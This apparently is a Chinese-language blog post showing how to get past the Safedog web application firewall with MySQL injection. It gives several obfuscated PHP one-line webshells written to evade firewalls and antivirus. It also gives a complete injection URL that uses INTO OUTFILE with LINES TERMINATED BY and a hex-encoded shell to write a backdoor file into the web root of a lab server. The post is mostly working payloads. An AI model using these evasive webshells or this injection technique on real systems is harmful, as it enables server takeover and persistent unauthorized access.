SQL注入过安全狗直接getshell

本文介绍了一种利用MySQL的特定功能和精心构造的一句话木马来绕过安全狗等WAF的方法,并详细展示了如何通过注入攻击将木马写入目标服务器的具体步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验环境

1、phpstudy搭建的SQLi-Labs(MySQL)
2、安全狗4.0

成功所需要的条件

1、准备一个可以过狗过杀软的一句话
2、网站目录的绝对路径

直接进入正题

普通的注入攻击直接被安全狗拦截
在这里插入图片描述
比方说我们获取到的网站绝对路径为“C:/phpStudy4IIS/WWW/”
(这里获取网站绝对路径有很多方式,不一一说明)

这里用到的注入用的是MySQL的数据导入功能“LINES TERMINATED BY”
它的功能就是将我们构造好的字符串直接导入在具体的文件里。很多waf并没有对MySQL的这个功能进行过滤检测。

这里分享几个可以过狗过杀软的一句话:

<?php '%00';"${/*%00*//*ee*/@/*vve*/@/*asd*/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Eval(@@@${/*_POCT*/"_PO"/*ce*/."ST"/*POCT*/}/**/['pass']/**/)/**//**/}/**/";
"${phpinfo()}";
"$@{phpinfo()}";
"${@@!phpinfo() }";
${"_POST"}['id’] == $_POST[‘id’];
var_dump(${"_POST"}['id']);
<?php

define(@"_"/*("%00_")*/, range(1,200), true);eval("echo '';".'/*");*/'.
${
''."_".''.chr(_[79]).''.
"OST".""}
[chr(_[104]).'d'.'']
);

 ?>

这里我们使用第一个进行构造Payload:

http://192.168.48.138:8980/sqli/Less%2D1/?id=1' LIMIT 0,1 INTO OUTFILE 'C:/phpStudy4IIS/WWW/ma7.php' LINES TERMINATED BY 0x3c3f7068702027253030273b22247b2f2a2530302a2f2f2a65652a2f402f2a7676652a2f402f2a6173642a2f404040404040404040404040404040404040404040404040404040404040404040404576616c28404040247b2f2a5f504f43542a2f225f504f222f2a63652a2f2e225354222f2a504f43542a2f7d2f2a2a2f5b2770617373275d2f2a2a2f292f2a2a2f2f2a2a2f7d2f2a2a2f223b --+

(这里的马需要使用十六进制编码)

成功注入后看一下效果

在这里插入图片描述
在这里插入图片描述

看一下马:
在这里插入图片描述
在这里插入图片描述

总结

1、使用“LINES TERMINATED BY ”过狗
2、使用免杀一句话过狗过杀软
3、配合网站绝对路径一步到位getshell

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值